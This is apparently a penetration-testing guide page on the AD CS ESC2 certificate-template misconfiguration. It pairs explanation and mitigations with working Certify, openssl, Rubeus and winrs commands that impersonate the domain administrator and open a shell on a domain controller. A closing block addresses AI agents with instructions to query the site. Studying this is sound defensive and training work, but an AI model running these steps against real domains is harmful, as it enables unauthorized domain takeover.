# ESC2

### What is ESC2?

ESC2 is an Active Directory Certificate Services (AD CS) privilege escalation misconfiguration caused by certificate templates that are configured with overly permissive Extended Key Usages (EKUs). A low-privileged domain user can request a certificate under these templates and abuse it to compromise the PKI infrastructure or authenticate to other services.

> **Key difference from ESC1:** ESC1 uses the **Client Authentication** EKU, which allows direct Kerberos PKINIT authentication. ESC2 uses **Any Purpose** or **No EKU**, which may not work for PKINIT directly but enables broader and often more dangerous abuse paths.

***

### Vulnerable EKU Configurations

| EKU Type        | OID           | Meaning                           | Abuse Potential                                       |
| --------------- | ------------- | --------------------------------- | ----------------------------------------------------- |
| **Any Purpose** | `2.5.29.37.0` | Wildcard — valid for all purposes | Client Auth, Code Signing, Server Auth, EFS, etc.     |
| **No EKU**      | *(absent)*    | Implicitly a SubCA template       | Can issue ANY cert for ANY user — full PKI compromise |

***

### Required Conditions

All of the following must be true on the vulnerable template:

* [x] `ENROLLEE_SUPPLIES_SUBJECT` flag is enabled (`CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`)
* [x] EKU is set to **Any Purpose** (`2.5.29.37.0`) **or** is completely absent (SubCA)
* [x] Low-privileged users have **Enroll** or **AutoEnroll** rights on the template
* [x] Manager approval is **not** required
* [x] No authorized signatures required

***

### ESC2 vs ESC1 - Key Comparison

|                           | ESC1                                   | ESC2                                       |
| ------------------------- | -------------------------------------- | ------------------------------------------ |
| **EKU**                   | Client Authentication                  | Any Purpose / No EKU                       |
| **Direct PKINIT (TGT)**   | ✅ Works reliably                       | ⚠️ Often fails — depends on DC patch level |
| **SubCA forgery**         | ❌ Not applicable                       | ✅ Possible with No EKU variant             |
| **Code signing abuse**    | ❌                                      | ✅                                          |
| **Schannel / LDAPS auth** | ✅                                      | ✅                                          |
| **Primary abuse path**    | Request cert → `asktgt` → Domain Admin | Request cert → SubCA chain or Schannel     |

***

### Core Concepts

#### "Any Purpose" EKU (OID: `2.5.29.37.0`)

A wildcard EKU that instructs Windows to accept the certificate for any purpose. This includes:

* Client Authentication
* Server Authentication
* Code Signing
* Encrypting File System (EFS)

#### "No EKU" (SubCA Template)

When a template has no EKU extension at all, the issued certificate behaves like a **Subordinate Certificate Authority**. This means:

* The certificate can **sign and issue new certificates**
* You can forge a certificate for **any user** with **any EKU** (including Client Authentication)
* This is effectively **complete PKI compromise**

***

### Exploitation - Windows (Certify + Rubeus)

#### Step 1  Find Vulnerable Templates

```
certify.exe find /enrolleeSuppliesSubject
```

**What to look for in output:**

```
[!] Vulnerable Certificates Templates :

    CA Name                : DC01.l1nuxkid.corp\l1nuxkid-CA
    Template Name          : VulnerableTemplate
    ...
    Enabled                : True
    Client Authentication  : False
    Enrollee Supplies Subject : True
    Certificate Name Flag  : EnrolleeSuppliesSubject
    pkiextendedkeyusage    : Any Purpose          <-- ESC2 "Any Purpose"
    mspki-certificate-...  : Any Purpose
    ...
    [+] User has enroll rights for template
```

***

#### Step 2  Get Domain SID

```powershell
# Method 1 - Get SID of Administrator directly
Get-ADUser -Identity administrator -Server l1nuxkid.corp

# Method 2 - Get Domain SID (Administrator is always RID 500)
(Get-ADDomain).DomainSID
# Result example: S-1-5-21-1234567890-987654321-1122334455
# Administrator SID = <DomainSID>-500
```

***

#### Step 3 — Request Certificate as Administrator

```
certify.exe request /ca:CA_SERVER\CA_NAME /template:TEMPLATE_NAME /altname:administrator /sidextension:S-1-5-21-DOMAIN-500 /domain:l1nuxkid.dev
```

| Flag                                | Purpose                                                     |
| ----------------------------------- | ----------------------------------------------------------- |
| `/altname:administrator`            | Embed Administrator as the Subject Alternative Name         |
| `/sidextension:S-1-5-21-DOMAIN-500` | Adds the SID extension — bypasses the CBA patch (KB5014754) |
| `/domain:`                          | Target domain                                               |

Save the output PEM block as `esc2.pem`.

***

#### Step 4 Convert Certificate to PFX

```bash
openssl pkcs12 -in esc2.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc2.pfx
```

You will be prompted for an export password remember it for the next steps.

***

#### Step 5  Attempt Direct PKINIT Authentication

```
Rubeus.exe asktgt /user:administrator /domain:l1nuxkid.dev /certificate:esc2.pfx /password:password123 /dc:DC01.l1nuxkid.dev /nowrap /ptt
```

***

#### Step 6  Verify & Use&#x20;

```cmd
# Verify the Kerberos ticket was injected into memory
klist

# Spawn a remote shell on the Domain Controller
winrs -r:DC01.l1nuxkid.dev cmd.exe
```

***

**Mitigations:**

* Remove `ENROLLEE_SUPPLIES_SUBJECT` from sensitive templates
* Restrict enroll rights to only required users/groups
* Enable Manager Approval on sensitive templates
* Apply KB5014754 and set `StrongCertificateBindingEnforcement = 2`
* Regularly audit templates with: `certutil -TCAInfo` and Certify/Certipy

***

### Tools Reference

| Tool                                            | Platform      | Use Case                             |
| ----------------------------------------------- | ------------- | ------------------------------------ |
| [Certify](https://github.com/GhostPack/Certify) | Windows       | Enumerate & request certificates     |
| [Rubeus](https://github.com/GhostPack/Rubeus)   | Windows       | PKINIT TGT requests, pass-the-ticket |
| [Certipy](https://github.com/ly4k/Certipy)      | Linux         | All-in-one: enum, request, auth      |
| `openssl`                                       | Linux/Windows | PEM → PFX conversion                 |
| `certutil`                                      | Windows       | Built-in CA enumeration              |


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://l1nuxkid.gitbook.io/l1nuxkid-docs/active-directory-certificate-services-ad-cs/esc2.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.